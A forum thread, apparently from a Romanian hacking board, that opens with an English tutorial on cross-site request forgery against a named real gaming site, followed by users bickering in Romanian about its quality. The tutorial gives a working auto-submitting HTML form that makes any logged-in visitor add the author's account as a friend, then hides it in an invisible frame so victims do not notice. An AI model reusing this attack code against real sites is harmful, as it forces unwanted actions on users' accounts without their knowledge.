CSRF (Cross Site Request Forgery) tutorial

[moubik]

A simple CSRF tutorial

Cross Site Request Forgery. What does it actually mean?

First let's check a site out:

http://sc.gosugamers.net

Create an account.

I've created an account named "websecurity.ro". Login and select Autologin

Login and select autologin

What does autologin mean ? It means that it saves the cookie and every time i'll enter that page i will be automatically logged (this is very important in CSRF)

Let's see for example how i can add a friend:

http://sc.gosugamers.net/friends/

Nice, i can add myself as a friend

I’ve added myself as a friend

Let's see how the addfriend form looks like (I'll use webdeveloper plugin from firefox):

<form action="admin/friends.php" method="post">

<input name="sql" value="a_f" type="hidden" />

<input name="f_name" style="width: 150px" type="text" />

<input value="Add user to my friends list" type="submit" />

</form>

from this code we can create this auto submitting html:

<form action="http://sc.gosugamers.net/admin/friends.php" method="post" name="dude">

<input name="sql" value="a_f" type="hidden" />

<input name="f_name" style="width: 150px" type="text" value="websecurity.ro" />

<input value="Add user to my friends list" type="submit" />

</form>

<script>

setTimeout("document.dude.submit()", 2000);

</script>

We can save this code as gosugamers_csrf.html

Anyone who is already logged in sc.gosugamers.net and enters gosugamers_csrf.html will automatically add "websecurity.ro" as their friend.

PoC: gosugamers_csrf.html

This is one of the most harmless CSRF that you can create on their website.

I don't really like how this piece of code gets executed, because the user can see that the request has been made and can undo it immediately.

Let's create another html:

<html>

<head></head>

<frameset rows="100%,0%">

<frame src="somecoolpage.html">

<frame src="gosugamers_csrf.html" name="littleframes">

</frameset>

</html>

And save it as gosugamers_hidden_csrf.html

This one loads 2 pages:

- somecoolpage.html that will blind the user who enters the page;

- gosugamers_csrf.html that will be almost invisible for the user.

The final CSRF PoC:

gosugamers_hidden_csrf.html

original article on http://websecurity.ro

http://websecurity.ro/blog/2007/11/17/csrf-cross-site-request-forgery-tutorial/

[tw8]

Sincer sa fiu, mi se pare cam slabut. Nu prea ai explicat codul, si celor care nu stiu deja cate ceva despre CSRF si ceva HTML, nu prea le e de folos, iar celor care stiu, nu le e de folos deloc. Cred ca trebuia sa explici putin mai bine.

In rest, toate bune .

Bafta !

[moubik]

nu e explicat pt bunica ta. accepta si taci.

[tw8]

De acum o sa tin minte. Cand o sa faci tu un tutorial, o sa zic, indiferent de cat e de bun (sau de prost ), ca mi-a placut foarte mult, pentru ca vad ca sinceritatea te enerveaza .

Bafta !

[moubik]

grow up.

vrei sa pun requirements pentru a citi acest tutorial ?

[tw8]

grow up.

Nu eu sunt cel care nu accepta parerea celorlalti. De fiecare data cand am facut un tutorial, am primit si laude, si critici. Insa, de fiecare data am primit critici diferite, nu am primit de 2 ori aceleasi comentarii, pentru ca eu tin cont de sfaturile celorlalti.

P.S.: Daca vrei sa ne mai "certam" in idei, te astept pe PM, ca sa nu facem offtopic .

[moubik]

m-ai invatat o lectie de viata. acum ma simt implinit.

esti cumva pustan ? ca te simti important vad

[tw8]

ca te simti important vad

Ce te face sa crezi asta ?

[d3v1l]

esti cumva pustan ? ca te simti important vad

suntetzi amandoi "pustani" pt ca daca atzi fi baietzi maturi nu vatzi certa pt nimicuri. btw..

Parerea mea?Nu vad rostul unui tutorial facut in "english" si post-at aici intr-un forum romanesc(avand in vedere ca nu prea exista reg externi, iar prea putini care sunt intra aici doar pt "tools" si "exploit-uri" nicidecum pt tutoriale!

Mai mult? -De ce drecu postati raspunsuri in limba romana din moment ce acest thread e doar pt "Tutoriale in engleza" Sau sa inteleg ca sunt "tutoriale in engleza"pt romani ?